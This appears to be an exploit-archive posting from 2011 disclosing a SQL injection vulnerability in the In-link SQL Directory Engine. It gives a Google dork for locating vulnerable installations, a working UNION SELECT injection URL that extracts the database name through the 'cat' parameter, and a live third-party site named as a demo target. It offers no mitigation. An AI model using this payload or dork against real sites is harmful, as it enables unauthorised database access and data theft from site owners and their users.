In-link SQL Directory Engine suffers from a remote SQL injection vulnerability.
53f57572f75fcb2bfd8bac069b13cca70403a4d0ffef3eeb4fd83ab689f3c477
# Exploit Title: In-link SQL Directory Engine (ALL VERSIONS) SQL INJECTION Vulnerabilities
# Google Dork: intext:In-link SQL Directory
# Date: 08/09/2011
# Author: http://www.in-portal.com/
# Software Link: http://www.in-portal.com/modules/directory-management.html
# Version: ALL Versions
# Tested on: Windows 7 , Ubuntu 11
# CVE :
# Exploit Discovered : SubhashDasyam
# Website : http://www.subhashdasyam.com
http://localhost/index.php?t=sub_pages&cat=-1+Union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
Demo:http://www.directorysoccer.com/index.php?t=sub_pages&cat=73438
Greetz to ALL INDIAN HACKERS and ALL HACKERS.
Security is ILLUSION
Greetz to Mr52,Jackh4x0r,Smith,Zone-Hacker,Dalsim,Exidous,HH,Aditya Modha,Jinen